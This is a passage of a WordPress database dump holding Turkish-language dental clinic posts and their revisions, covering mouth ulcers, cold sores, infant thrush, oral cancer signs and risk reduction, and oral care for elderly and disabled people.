Aftların herhangi bir etkeni olmadığı için yaradan, sağlıklı dokuya bulaşma gibi bir riski yoktur. Ancak aftların açılması durumunda ağızda bulunabilecek birçok bakteri bu aftların enfekte yara olmasına sebep olabilir. Bu süreçte tüketilebilecek tuzlu, baharatlı, asitli yiyecekler aftların açılmasına ve enfeksiyon kapmasına neden olabilirler. Bu nedenle beslenmeye dikkat edilmelidir.\r\n\r\nAğız yaraları ciddi konulardır. Bazı ağız yaraları neden yokken ortaya çıkarken, bazı yaralar ikincil olarak başka bir hastalığın etkisinde oluşabilirler. Eğer sıklıkla ağız içi yaralarınız oluyorsa ve iyileşmesi uzun süre alıyorsa bir hekime başvurmanız gerekir.\r\n\r\n<strong>Uçuk neden oluşur?</strong>\r\n\r\nAftlara göre daha ağrılı ve enfekte özelliğe sahip olan uçuklar, virüs kaynaklı oluşumlardır. İçi sıvı dolu ağrılı kabarcıklar halinde, ağız içinde, dışında hatta yüzün başka bölgelerinde de çıkabilen bu yaralara ‘Herpes Simplex’ virüsü sebep olur. Bu virüs, kişinin vücuduna bulaşıp uçuğu meydana getirdikten sonra, uçuk tedavi edilse dahi vücutta bekleyebilir. Vücudun direnci azaldığı an sinsice bekleyen bu virüs, aktif hale geçer ve yeniden uçuk oluşturur. Genellikle aynı yerde çıkma eğilimine sahiptir. Direncin düşmesi sonucu tekrar başlama eğilimi gösteren uçukların oluşmasında diğer yardımcı faktörler de güneş ışınları ve hormonal düzensizliklerdir.\r\n\r\n<strong>Uçuk oluştuğu durumlarda ne yapmak gerekir?</strong>\r\n\r\nUçuk, afta göre çok hızlı yayılabilen ve başka insanlara da bulaşan bir hastalıktır. Uçuğun başlama, gelişme ve enfeksiyonu dışarıya akıtma olarak sıralanabilecek 3 farklı dönemi vardır. Bulaşma riskinin en yoğun olduğu dönem yaranın patladıktan sonraki dönemdir. Uçuk çıkaran kişinin özellikle uçuk bölgesine temas eden kişisel eşyalarının, sağlıklı kişiler tarafından kullanılmamasına özen göstermek gerekir. Uçuk nerede başlarsa başlasın, kişinin başkasını korumasının yanı sıra kendini de koruması gerekir. Ağızda başlayan uçuk başka bölgelere kişinin kendisi tarafından bulaştırılabilir.\r\nBir lezyon başladığında bu lezyonu kaşımamak oldukça önem taşır. Enfeksiyon etkeni, el ile burun içine ve hatta genital bölge mukozasına bile kolaylıkla bulaştırılabilir. Uçuğu sıkmak, oynamak gibi davranışlar oldukça yanlıştır. Uçuğu çıkaran kişinin sıklıkla ellerini bol sabunlu su ile yıkaması hastalığın tedavisi ve yeni bir uçuk oluşumunun önlenmesi açısından oldukça önemlidir. Tedavide antiviral kremler ya da oral ilaçlar hekim tarafından önerilir.\r\n\r\n<strong>Pamukçuk nedir, nasıl oluşur, tedavisi için ne yapılmalıdır?</strong>\r\n\r\nPamukçuk, bebeğin dil, damak ve yanak içlerinde süt parçalarını andıran beyaz lezyonlardır. Bir cins mantar olan ‘Kandida enfeksiyonu’ nedeniyle oluşur. Pamukçuk en çok yeni doğanlarda görülür fakat bazen daha büyük bebeklerde de görülebilir. Önce beyaz lekeler halinde başlar. Sonra tüm dili ve ağız içini kaplar. Dildeki lezyon kazınırsa altında deri yanmış gibi görünür ve kanayabilir, sızıntılı yüzeysel bir ülser belirir. Pamukçuk, ağrı yaparak bebeğin beslenmesini engeller. Sağlıklı bir bebek, genellikle hastalığı kendi başına yenebilir. Annenin göğüs temizliği ve her tür beslenme araçlarının temizliği bu rahatsızlığın yok edilmesinde çok önemlidir. Ayrıca temiz bir mendille çocuğun ağzındaki lekeli bölümler zorlamadan silinebilir. Pamukçuk geniş bir alana yayılmışsa, mutlaka hekime başvurulmalıdır.\r\n\r\n<strong>Ağız kanserlerinin sebepleri nedir?</strong>\r\n\r\nAğız kanserlerinin çoğunlukla 45 yaşın üzerinde ortaya çıkar ve erkeklerde oluşma olasılığı kadınlara oranla 2 kat fazladır. Görüldüğü yerler ise sıklıkla; dil, ağız tabanı, dil köküne yakın yumuşak damak alanları, dudaklar ve diş etleridir.\r\nAğız kanserlerinin kesin nedeni tam olarak bilinmez. Bununla beraber, tütün ürünleri, alkol, bazı besinlerdeki kanserojen maddeler ve özellikle ağız dışı bölgelerde (dudak gibi) fazla güneş ışığına maruz kalınması gibi faktörlerin kanser riskini artırdığı bilinmektedir. Genetik yatkınlık da ağız kanserleri için risk faktörleri arasındadır.\r\n\r\n<strong>Ağız kanserlerinin belirtileri nelerdir?</strong>\r\n<ul>\r\n 	<li>Ağız içinde ya da etrafında beyaz veya kırmızı renkli alanlar ,</li>\r\n 	<li>Ağız içinde hassas, tahriş olmuş, kabarık veya kalınlaşmış alanlar,</li>\r\n 	<li>Ağızda veya boğazda tekrarlayan kanamalar,</li>\r\n 	<li>Seste boğukluk veya boğazda yutulamayan cisim hissi,</li>\r\n 	<li>Çiğneme ve yutma güçlüğü,</li>\r\n 	<li>Dil ve çene hareketlerinde zorlanma,</li>\r\n 	<li>Dil veya ağzın diğer bölgelerinde his kaybı, uyuşukluk,</li>\r\n 	<li>Alt veya üst çenede meydana gelen şişlikler ve bunun sonucu mevcut protez uyumunun bozulması…</li>\r\n</ul>\r\nAğız kanseri lezyonları başlangıç döneminde ağrısızdır ve bu nedenle de ihmal edilebilirler. Ağız kanserleri erken dönemde teşhis edilerek tedavi sağlanmazsa yayılarak sürekli ağrı, fonksiyon kaybı, tedavi sonrası düzeltilmesi mümkün olmayan yüz ve ağız deformiteleri, hatta ölümlere neden olabilir. Diş hekimine düzenli aralıklarla gidilmesi ağız kanserlerinin erken dönemde yakalanması açısından da önemlidir.\r\n\r\n<strong>Ağız kanseri riskini azaltmak mümkün müdür?</strong>\r\n\r\nAğız kanseri riski bazı önlemler alınarak azaltılabilir. Bu önlemler:\r\n<ul>\r\n 	<li>Sigara, pipo gibi tütün ürünlerini kullanmayınız, tütün çiğnemeyiniz</li>\r\n 	<li>Alkol kullanıyorsanız, aşırıya kaçmayınız.\r\n(Hem alkol hem de tütün ürünlerini kullanan kişilerde ağız kanseri riski alkol ve tütün ürünlerini kullanmayan kişilere göre 15 kat fazladır.)</li>\r\n 	<li>Meyve ve sebzeden zengin diyetle besleniniz.\r\n(Araştırmalar bu tür diyetin ağız kanseri riskini azaltabileceğini ileri sürmektedir)</li>\r\n 	<li>Düzenli olarak diş hekimine gitmeyi ihmal etmeyiniz.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Ağız Yaraları ve Kanserler', '', 'publish', 'closed', 'closed', '', 'agiz-yaralari-ve-kanserler', '', '', '2018-07-13 13:35:46', '2018-07-13 10:35:46', '', 0, 'http://www.ze-dent.com/?p=6266', 0, 'post', '', 0),
(6267, 1, '2018-07-13 13:35:34', '2018-07-13 10:35:34', '', 'agiz-yaralari', '', 'inherit', 'closed', 'closed', '', 'agiz-yaralari', '', '', '2018-07-13 13:35:34', '2018-07-13 10:35:34', '', 6266, 'http://www.ze-dent.com/wp-content/uploads/2018/07/agiz-yaralari.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(6268, 1, '2018-07-13 13:35:46', '2018-07-13 10:35:46', '[vc_row][vc_column][vc_column_text]<strong>Aft neden oluşur?</strong>\r\n\r\nGenellikle ağız içinde dil, yanak içleri, diş etleri ve damakta, zaman zamansa dudaklarda görülen aftın oluşma nedeninin belirlenmesi için çeşitli araştırmalar yapılsa da bugüne kadar kesin bir neden ortaya konulamamıştır.\r\n\r\nAncak tespit edilen bazı nedenleri sıralamak gerekirse;\r\n<ul>\r\n 	<li>Sistemik rahatsızlıklar (Behçet hastalığı, Chron hastalığı vb.),</li>\r\n 	<li>Vitamin ve mineral eksiklikleri (B vitamini, çinko vb.),</li>\r\n 	<li>Psikolojik sebepler (stres vb.),</li>\r\n 	<li>Bayanlarda regl öncesi dönem,</li>\r\n 	<li>Ağız için travmalar (ısırma, çarpma vb.),</li>\r\n 	<li>Ağız içi operasyonlar,</li>\r\n 	<li>Bazı gıda maddeleri (tuzlu, asitli, baharatlı),</li>\r\n 	<li>Alerjik reaksiyonlar,</li>\r\n 	<li>Sigara…</li>\r\n</ul>\r\n<strong>Aft oluştuğu durumlarda ne yapmak gerekir?</strong>\r\n\r\nAft’lar yaklaşık bir hafta sürer ve bu dönemde bölgesel ağrılara neden olabilirler. Beslenme yoluyla ağza giren besinlerse bu ağrının artmasına sebep olurlar. Aftların herhangi bir etkeni olmadığı için yaradan, sağlıklı dokuya bulaşma gibi bir riski yoktur. Ancak aftların açılması durumunda ağızda bulunabilecek birçok bakteri bu aftların enfekte yara olmasına sebep olabilir. Bu süreçte tüketilebilecek tuzlu, baharatlı, asitli yiyecekler aftların açılmasına ve enfeksiyon kapmasına neden olabilirler. Bu nedenle beslenmeye dikkat edilmelidir.\r\n\r\nAğız yaraları ciddi konulardır. Bazı ağız yaraları neden yokken ortaya çıkarken, bazı yaralar ikincil olarak başka bir hastalığın etkisinde oluşabilirler. Eğer sıklıkla ağız içi yaralarınız oluyorsa ve iyileşmesi uzun süre alıyorsa bir hekime başvurmanız gerekir.\r\n\r\n<strong>Uçuk neden oluşur?</strong>\r\n\r\nAftlara göre daha ağrılı ve enfekte özelliğe sahip olan uçuklar, virüs kaynaklı oluşumlardır. İçi sıvı dolu ağrılı kabarcıklar halinde, ağız içinde, dışında hatta yüzün başka bölgelerinde de çıkabilen bu yaralara ‘Herpes Simplex’ virüsü sebep olur. Bu virüs, kişinin vücuduna bulaşıp uçuğu meydana getirdikten sonra, uçuk tedavi edilse dahi vücutta bekleyebilir. Vücudun direnci azaldığı an sinsice bekleyen bu virüs, aktif hale geçer ve yeniden uçuk oluşturur. Genellikle aynı yerde çıkma eğilimine sahiptir. Direncin düşmesi sonucu tekrar başlama eğilimi gösteren uçukların oluşmasında diğer yardımcı faktörler de güneş ışınları ve hormonal düzensizliklerdir.\r\n\r\n<strong>Uçuk oluştuğu durumlarda ne yapmak gerekir?</strong>\r\n\r\nUçuk, afta göre çok hızlı yayılabilen ve başka insanlara da bulaşan bir hastalıktır. Uçuğun başlama, gelişme ve enfeksiyonu dışarıya akıtma olarak sıralanabilecek 3 farklı dönemi vardır. Bulaşma riskinin en yoğun olduğu dönem yaranın patladıktan sonraki dönemdir. Uçuk çıkaran kişinin özellikle uçuk bölgesine temas eden kişisel eşyalarının, sağlıklı kişiler tarafından kullanılmamasına özen göstermek gerekir. Uçuk nerede başlarsa başlasın, kişinin başkasını korumasının yanı sıra kendini de koruması gerekir. Ağızda başlayan uçuk başka bölgelere kişinin kendisi tarafından bulaştırılabilir.\r\nBir lezyon başladığında bu lezyonu kaşımamak oldukça önem taşır. Enfeksiyon etkeni, el ile burun içine ve hatta genital bölge mukozasına bile kolaylıkla bulaştırılabilir. Uçuğu sıkmak, oynamak gibi davranışlar oldukça yanlıştır. Uçuğu çıkaran kişinin sıklıkla ellerini bol sabunlu su ile yıkaması hastalığın tedavisi ve yeni bir uçuk oluşumunun önlenmesi açısından oldukça önemlidir. Tedavide antiviral kremler ya da oral ilaçlar hekim tarafından önerilir.\r\n\r\n<strong>Pamukçuk nedir, nasıl oluşur, tedavisi için ne yapılmalıdır?</strong>\r\n\r\nPamukçuk, bebeğin dil, damak ve yanak içlerinde süt parçalarını andıran beyaz lezyonlardır. Bir cins mantar olan ‘Kandida enfeksiyonu’ nedeniyle oluşur. Pamukçuk en çok yeni doğanlarda görülür fakat bazen daha büyük bebeklerde de görülebilir. Önce beyaz lekeler halinde başlar. Sonra tüm dili ve ağız içini kaplar. Dildeki lezyon kazınırsa altında deri yanmış gibi görünür ve kanayabilir, sızıntılı yüzeysel bir ülser belirir. Pamukçuk, ağrı yaparak bebeğin beslenmesini engeller. Sağlıklı bir bebek, genellikle hastalığı kendi başına yenebilir. Annenin göğüs temizliği ve her tür beslenme araçlarının temizliği bu rahatsızlığın yok edilmesinde çok önemlidir. Ayrıca temiz bir mendille çocuğun ağzındaki lekeli bölümler zorlamadan silinebilir. Pamukçuk geniş bir alana yayılmışsa, mutlaka hekime başvurulmalıdır.\r\n\r\n<strong>Ağız kanserlerinin sebepleri nedir?</strong>\r\n\r\nAğız kanserlerinin çoğunlukla 45 yaşın üzerinde ortaya çıkar ve erkeklerde oluşma olasılığı kadınlara oranla 2 kat fazladır. Görüldüğü yerler ise sıklıkla; dil, ağız tabanı, dil köküne yakın yumuşak damak alanları, dudaklar ve diş etleridir.\r\nAğız kanserlerinin kesin nedeni tam olarak bilinmez. Bununla beraber, tütün ürünleri, alkol, bazı besinlerdeki kanserojen maddeler ve özellikle ağız dışı bölgelerde (dudak gibi) fazla güneş ışığına maruz kalınması gibi faktörlerin kanser riskini artırdığı bilinmektedir. Genetik yatkınlık da ağız kanserleri için risk faktörleri arasındadır.\r\n\r\n<strong>Ağız kanserlerinin belirtileri nelerdir?</strong>\r\n<ul>\r\n 	<li>Ağız içinde ya da etrafında beyaz veya kırmızı renkli alanlar ,</li>\r\n 	<li>Ağız içinde hassas, tahriş olmuş, kabarık veya kalınlaşmış alanlar,</li>\r\n 	<li>Ağızda veya boğazda tekrarlayan kanamalar,</li>\r\n 	<li>Seste boğukluk veya boğazda yutulamayan cisim hissi,</li>\r\n 	<li>Çiğneme ve yutma güçlüğü,</li>\r\n 	<li>Dil ve çene hareketlerinde zorlanma,</li>\r\n 	<li>Dil veya ağzın diğer bölgelerinde his kaybı, uyuşukluk,</li>\r\n 	<li>Alt veya üst çenede meydana gelen şişlikler ve bunun sonucu mevcut protez uyumunun bozulması…</li>\r\n</ul>\r\nAğız kanseri lezyonları başlangıç döneminde ağrısızdır ve bu nedenle de ihmal edilebilirler. Ağız kanserleri erken dönemde teşhis edilerek tedavi sağlanmazsa yayılarak sürekli ağrı, fonksiyon kaybı, tedavi sonrası düzeltilmesi mümkün olmayan yüz ve ağız deformiteleri, hatta ölümlere neden olabilir. Diş hekimine düzenli aralıklarla gidilmesi ağız kanserlerinin erken dönemde yakalanması açısından da önemlidir.\r\n\r\n<strong>Ağız kanseri riskini azaltmak mümkün müdür?</strong>\r\n\r\nAğız kanseri riski bazı önlemler alınarak azaltılabilir. Bu önlemler:\r\n<ul>\r\n 	<li>Sigara, pipo gibi tütün ürünlerini kullanmayınız, tütün çiğnemeyiniz</li>\r\n 	<li>Alkol kullanıyorsanız, aşırıya kaçmayınız.\r\n(Hem alkol hem de tütün ürünlerini kullanan kişilerde ağız kanseri riski alkol ve tütün ürünlerini kullanmayan kişilere göre 15 kat fazladır.)</li>\r\n 	<li>Meyve ve sebzeden zengin diyetle besleniniz.\r\n(Araştırmalar bu tür diyetin ağız kanseri riskini azaltabileceğini ileri sürmektedir)</li>\r\n 	<li>Düzenli olarak diş hekimine gitmeyi ihmal etmeyiniz.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Ağız Yaraları ve Kanserler', '', 'inherit', 'closed', 'closed', '', '6266-revision-v1', '', '', '2018-07-13 13:35:46', '2018-07-13 10:35:46', '', 6266, 'http://www.ze-dent.com/6266-revision-v1/', 0, 'revision', '', 0),
(6269, 1, '2018-07-13 13:38:57', '2018-07-13 10:38:57', '[vc_row][vc_column][vc_column_text]<strong>Yaşlılığa bağlı oluşan ağız ve diş problemleri nelerdir?</strong>\r\n\r\nAğız sağlığının bozulması, yaşlanmanın doğal bir sonucu değildir. Bu durum, koruyucu diş hekimliği hizmetlerinin yetersizliğine, sistemik hastalıklara, ilaç kullanımına, yetersiz beslenmeye ve uygun yapılmayan ağız bakımına bağlı olarak gelişir.\r\n<ul>\r\n 	<li>Genel olarak, yaşlanma ile ilgili olduğu düşünülen ağız içi değişiklikler; diş kaybı, diş renginde koyulaşma, dişeti çekilmeleri, tükürük miktarının azalması, ağız dokusunda ve kaslarda zayıflama ve tat duyusunun azalmasıdır. Yaşlanmaya paralel olarak minede meydana gelen aşınma sonucu dişlerde şekilsel değişiklikler görülür. Bu durum basit yüzeysel aşınmalardan önemli madde kaybına kadar ilerleyebilir.</li>\r\n 	<li>Yaşlı nüfusun önemli bir bölümü hareketli protez kullanmaktadır. Bu protezler, ağız içi dokuların hem görünümlerini ve hem de bütünlüğünü etkileyen değişikliklere yol açabilir. Bu durum çiğneme fonksiyonunda ve beslenme alışkanlıklarında farklılaşmalara yol açar.</li>\r\n 	<li>Yaşlanmayla birlikte, sıklıkla kadınlarda olmak üzere bütün kemiklerde (Osteoporoz) kemik erimesi görülür. Protez kullanmayan yaşlı hastalarda bu durum, yüzde ve dudaklarda çöküntüye, ağızda büzülmeye ve dudak köşelerinden başlayan kırışıklıklara neden olur.</li>\r\n 	<li>Alt çenedeki kemik yıkımı ileri boyutlara ulaştığı zaman, çene kemikleri incelir ve bıçak şeklinde keskin hale gelir bu da protezlerin kullanımını zorlaştırır. Çene kemiklerinin doğal yapısını koruyabilmek için, fonksiyon görebilen dişlerin veya diş köklerinin ağızda tutulması gerekmektedir.</li>\r\n 	<li>Yaşla birlikte tükürük akışkanlığı azalır. Bu duruma bağlı olarak bakteriyel plak birikimi oluşur dolayısıyla çürük ve diş eti hastalık riski artar, mantar tipi enfeksiyonlar görülebilir. Ağız kuruluğu, ağız içi dokuların darbelere karşı direncini de azalttığı için ağızda yaralara sık rastlanır. Ayrıca kuruluk dilin üzerinde yiyecek artıklarından oluşan bir tabaka birikmesine neden olur buda tat alma duyusunda azalmaya neden olur. Dilde yanma, kaşıntı ve ağrı vardır. Protezlerin tutuculuğu azalmıştır, bu nedenle hastaların çiğneme, yutkunma ve konuşma fonksiyonları olumsuz yönde etkilenir.</li>\r\n 	<li>Hareketli protezler, ağız içi geniş yüzeyleri kaplayarak tat alınmasını da engellerler. Tat hassasiyetinin azalmasına bağlı olarak, yaşlıda tuz ve şeker tüketimi artar ve bu durum sistemik problemlerin gelişmesine neden olur.</li>\r\n 	<li>Eklemde meydana gelen deformasyonlar sonucu, ağzın açılması sırasında hafiften şiddetliye değişen sesler duyulur. Ayrıca, hatalı yapılmış dolgular, diş gıcırdatma gibi faktörler de dişlerin çiğneme yüzeylerinde değişiklikler yaratarak, alt ve üst çene dişlerinin kapanış ilişkilerinin bozulmasına neden olur. Bu durum çene ekleminde ağrı ve hareketlerde kısıtlılık yaratır.</li>\r\n 	<li>Yaşlıda, kronik hastalıklar, ilaç kullanımı, çiğneme ve yutma bozuklukları, tat duyusunun azalması, fiziksel bozukluklar ve hareketliliğin azalması dolayısıyla besin alımının azalması gibi fiziksel etmenlerin yanı sıra çeşitli psikolojik ve sosyal etmenlerde, beslenme bozukluklarına yol açar.</li>\r\n</ul>\r\n<strong>Yaşlılarda ağız ve protez bakımı nasıl olmalıdır?</strong>\r\n<ul>\r\n 	<li>Yaşlı bireyler ağız bakımı açısından altı ayda bir kontrol edilmelidir. Ancak, ağız bakımı iyi olmayan ve ağız dokularını etkileyen sistemik hastalığı olanlar daha kısa 1-3 ay gibi aralıklarla görülmelidir.</li>\r\n 	<li>Yaşlılarda diş eti mekanik kuvvetlere karşı dirençli olmadığı için, bu hastalara yumuşak kıllardan oluşan diş fırçaları tavsiye edilir.</li>\r\n 	<li>Floridli diş macunları ve ağız gargaraları önerilir.</li>\r\n 	<li>Dişlere yapılan flor uygulamaları ile kök çürüklerinin oluşumu veya başlangıç halindeki çürüklerin ilerlemesi önlenebilmektedir.</li>\r\n 	<li>Diş eti dokusunun kaybı sonucu oluşan dişler arası boşluklar, besin birikimine neden olacağı için, bu alanların temizliği arayüz fırçası ve diş ipliği ile yapılmalıdır.</li>\r\n 	<li>Ağız bakımını gerçekleştiremeyen yatağa bağımlı hastalarda bu işlem, hasta yakınları ve yardımcı sağlık personeli tarafından yapılır.</li>\r\n 	<li>Yaşlıda diş kaybı fazla olduğu için, kalan dişler sabit veya hareketli protezlerin tutuculuğunda önemli rol oynarlar. Bu yüzden, çürük dişlerin tedavisi gereklidir</li>\r\n 	<li>Sürekli alınan bazı ilaçlar ağız kuruluğuna neden olabilirler. Tükürük dişleri çürüğe karşı koruyan doğal bir salgıdır, bu nedenle tükürük salgısında azalma varsa diş hekiminize danışın.</li>\r\n 	<li>Protezler yemeklerden sonra protez fırçası ile temizlenmeli, gece mutlaka çıkarılmalıdır. Diş etlerinizin de dinlenmeye ve havalanmaya ihtiyacı vardır. Çıkarılan protezler soğuk su içinde tutulmalıdır. Ayrıca, protez temizleme tabletleri de protezlerin mikroplardan arınmasına yardımcı olur.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Yaşlılarda Ağız ve Diş Sağlığı', '', 'publish', 'closed', 'closed', '', 'yaslilarda-agiz-ve-dis-sagligi', '', '', '2018-07-13 13:38:57', '2018-07-13 10:38:57', '', 0, 'http://www.ze-dent.com/?p=6269', 0, 'post', '', 0),
(6270, 1, '2018-07-13 13:38:45', '2018-07-13 10:38:45', '', 'yaslilarda-agiz-ve-dis-sagligi', '', 'inherit', 'closed', 'closed', '', 'yaslilarda-agiz-ve-dis-sagligi', '', '', '2018-07-13 13:38:45', '2018-07-13 10:38:45', '', 6269, 'http://www.ze-dent.com/wp-content/uploads/2018/07/yaslilarda-agiz-ve-dis-sagligi.jpg', 0, 'attachment', 'image/jpeg', 0),
(6271, 1, '2018-07-13 13:38:57', '2018-07-13 10:38:57', '[vc_row][vc_column][vc_column_text]<strong>Yaşlılığa bağlı oluşan ağız ve diş problemleri nelerdir?</strong>\r\n\r\nAğız sağlığının bozulması, yaşlanmanın doğal bir sonucu değildir. Bu durum, koruyucu diş hekimliği hizmetlerinin yetersizliğine, sistemik hastalıklara, ilaç kullanımına, yetersiz beslenmeye ve uygun yapılmayan ağız bakımına bağlı olarak gelişir.\r\n<ul>\r\n 	<li>Genel olarak, yaşlanma ile ilgili olduğu düşünülen ağız içi değişiklikler; diş kaybı, diş renginde koyulaşma, dişeti çekilmeleri, tükürük miktarının azalması, ağız dokusunda ve kaslarda zayıflama ve tat duyusunun azalmasıdır. Yaşlanmaya paralel olarak minede meydana gelen aşınma sonucu dişlerde şekilsel değişiklikler görülür. Bu durum basit yüzeysel aşınmalardan önemli madde kaybına kadar ilerleyebilir.</li>\r\n 	<li>Yaşlı nüfusun önemli bir bölümü hareketli protez kullanmaktadır. Bu protezler, ağız içi dokuların hem görünümlerini ve hem de bütünlüğünü etkileyen değişikliklere yol açabilir. Bu durum çiğneme fonksiyonunda ve beslenme alışkanlıklarında farklılaşmalara yol açar.</li>\r\n 	<li>Yaşlanmayla birlikte, sıklıkla kadınlarda olmak üzere bütün kemiklerde (Osteoporoz) kemik erimesi görülür. Protez kullanmayan yaşlı hastalarda bu durum, yüzde ve dudaklarda çöküntüye, ağızda büzülmeye ve dudak köşelerinden başlayan kırışıklıklara neden olur.</li>\r\n 	<li>Alt çenedeki kemik yıkımı ileri boyutlara ulaştığı zaman, çene kemikleri incelir ve bıçak şeklinde keskin hale gelir bu da protezlerin kullanımını zorlaştırır. Çene kemiklerinin doğal yapısını koruyabilmek için, fonksiyon görebilen dişlerin veya diş köklerinin ağızda tutulması gerekmektedir.</li>\r\n 	<li>Yaşla birlikte tükürük akışkanlığı azalır. Bu duruma bağlı olarak bakteriyel plak birikimi oluşur dolayısıyla çürük ve diş eti hastalık riski artar, mantar tipi enfeksiyonlar görülebilir. Ağız kuruluğu, ağız içi dokuların darbelere karşı direncini de azalttığı için ağızda yaralara sık rastlanır. Ayrıca kuruluk dilin üzerinde yiyecek artıklarından oluşan bir tabaka birikmesine neden olur buda tat alma duyusunda azalmaya neden olur. Dilde yanma, kaşıntı ve ağrı vardır. Protezlerin tutuculuğu azalmıştır, bu nedenle hastaların çiğneme, yutkunma ve konuşma fonksiyonları olumsuz yönde etkilenir.</li>\r\n 	<li>Hareketli protezler, ağız içi geniş yüzeyleri kaplayarak tat alınmasını da engellerler. Tat hassasiyetinin azalmasına bağlı olarak, yaşlıda tuz ve şeker tüketimi artar ve bu durum sistemik problemlerin gelişmesine neden olur.</li>\r\n 	<li>Eklemde meydana gelen deformasyonlar sonucu, ağzın açılması sırasında hafiften şiddetliye değişen sesler duyulur. Ayrıca, hatalı yapılmış dolgular, diş gıcırdatma gibi faktörler de dişlerin çiğneme yüzeylerinde değişiklikler yaratarak, alt ve üst çene dişlerinin kapanış ilişkilerinin bozulmasına neden olur. Bu durum çene ekleminde ağrı ve hareketlerde kısıtlılık yaratır.</li>\r\n 	<li>Yaşlıda, kronik hastalıklar, ilaç kullanımı, çiğneme ve yutma bozuklukları, tat duyusunun azalması, fiziksel bozukluklar ve hareketliliğin azalması dolayısıyla besin alımının azalması gibi fiziksel etmenlerin yanı sıra çeşitli psikolojik ve sosyal etmenlerde, beslenme bozukluklarına yol açar.</li>\r\n</ul>\r\n<strong>Yaşlılarda ağız ve protez bakımı nasıl olmalıdır?</strong>\r\n<ul>\r\n 	<li>Yaşlı bireyler ağız bakımı açısından altı ayda bir kontrol edilmelidir. Ancak, ağız bakımı iyi olmayan ve ağız dokularını etkileyen sistemik hastalığı olanlar daha kısa 1-3 ay gibi aralıklarla görülmelidir.</li>\r\n 	<li>Yaşlılarda diş eti mekanik kuvvetlere karşı dirençli olmadığı için, bu hastalara yumuşak kıllardan oluşan diş fırçaları tavsiye edilir.</li>\r\n 	<li>Floridli diş macunları ve ağız gargaraları önerilir.</li>\r\n 	<li>Dişlere yapılan flor uygulamaları ile kök çürüklerinin oluşumu veya başlangıç halindeki çürüklerin ilerlemesi önlenebilmektedir.</li>\r\n 	<li>Diş eti dokusunun kaybı sonucu oluşan dişler arası boşluklar, besin birikimine neden olacağı için, bu alanların temizliği arayüz fırçası ve diş ipliği ile yapılmalıdır.</li>\r\n 	<li>Ağız bakımını gerçekleştiremeyen yatağa bağımlı hastalarda bu işlem, hasta yakınları ve yardımcı sağlık personeli tarafından yapılır.</li>\r\n 	<li>Yaşlıda diş kaybı fazla olduğu için, kalan dişler sabit veya hareketli protezlerin tutuculuğunda önemli rol oynarlar. Bu yüzden, çürük dişlerin tedavisi gereklidir</li>\r\n 	<li>Sürekli alınan bazı ilaçlar ağız kuruluğuna neden olabilirler. Tükürük dişleri çürüğe karşı koruyan doğal bir salgıdır, bu nedenle tükürük salgısında azalma varsa diş hekiminize danışın.</li>\r\n 	<li>Protezler yemeklerden sonra protez fırçası ile temizlenmeli, gece mutlaka çıkarılmalıdır. Diş etlerinizin de dinlenmeye ve havalanmaya ihtiyacı vardır. Çıkarılan protezler soğuk su içinde tutulmalıdır. Ayrıca, protez temizleme tabletleri de protezlerin mikroplardan arınmasına yardımcı olur.</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]', 'Yaşlılarda Ağız ve Diş Sağlığı', '', 'inherit', 'closed', 'closed', '', '6269-revision-v1', '', '', '2018-07-13 13:38:57', '2018-07-13 10:38:57', '', 6269, 'http://www.ze-dent.com/6269-revision-v1/', 0, 'revision', '', 0),
(6272, 1, '2018-07-13 13:41:47', '2018-07-13 10:41:47', '[vc_row][vc_column][vc_column_text]<strong>Engellilerde görülebilen ağız ve diş sorunları nelerdir?</strong>\r\n\r\nEngelli bireyler, ağız-diş hastalıkları bakımından yüksek risk gurubundadır ve sorunları büyük önem taşır.\r\n<ul>\r\n 	<li>Bu bireylerde beslenme ve çiğneme problemleri yaygındır.</li>\r\n 	<li>Diş kayıpları ile birlikte konuşma problemlerinde artış gözlenir, çocukların eğitimlerinde verim kaybı olur.</li>\r\n 	<li>Hastaların çoğu protez veya diğer apareyleri kullanmaya uyum sağlayamaz.</li>\r\n</ul>\r\n<strong>Engellilerde ağız ve diş sağlığını korumak için neler yapılmalıdır?</strong>\r\n<ul>\r\n 	<li>Beslenme alışkanlıklarına özel dikkat gerekmektedir. Biberonla beslenen engellilerde tüketilen süt, hazır mama ve meyve suları şeker içerdiğinden uzun süre bu tarz beslenme biberon çürüklerine neden olur. Beslenme sonrası su içirilmesi ya da ağzın bir tülbentle temizlenmesi gereklidir. Önlem olarak mümkünse gece beslenmelerinin kaldırılmalıdır.</li>\r\n 	<li>Diş çürüğünün ana nedeni şekerli, asitli, diş ve diş etine kolayca yapışıp kalan besin maddeleridir. Engelliye özel bir diyet önerilmemiş ise bol şeker ve karbonhidrat içeren gıda maddeleri yemek aralarında verilmemeli, bu gıdalar ana öğünlerde tüketilmelidir.</li>\r\n 	<li>Püre tarzında, yumuşak gıdalarla beslenmek zorunda kalan engellilerde diş fırçalama yapılamıyorsa yemek sonrası ağız çalkalatılmalı ya da gıda artıkları silinerek temizlenmelidir.</li>\r\n 	<li>Şurup formundaki ilaçların çoğu şeker içerdiğinden bu ilaçları sürekli kullananlar ağız-diş bakımına daha özen göstermelidirler.</li>\r\n 	<li>Dişler daha ağızda görünür görünmez, beslenme aralarında nemli bir tülbent ile temizlenmelidir. İki yaşından sonra küçük ve yumuşak kıllı bir diş fırçası ile diş bakımı yapılmalıdır. Kötü ağız kokusunu önlemek için dilin de fırçalanması gereklidir. Özel üç yüzlü fırçalar ve elektrikli diş fırçaları kullanım kolaylığı açısından önerilmektedir.</li>\r\n 	<li>Diş çürüğünü önlemek amacıyla flor uygulamaları yapılmalıdır. Engelli bireyler için tablet formları veya diş hekiminin uygulayabileceği jel formları tercih edilir.</li>\r\n 	<li>Kalıcı dişler sürdükten sonra dişlerin çiğneme yüzeylerine diş hekimi tarafından fissür örtücü cilalar uygulanmalıdır.</li>\r\n 	<li>Güven ilişkisi açısından mümkünse hasta takibi aynı diş hekimi tarafından 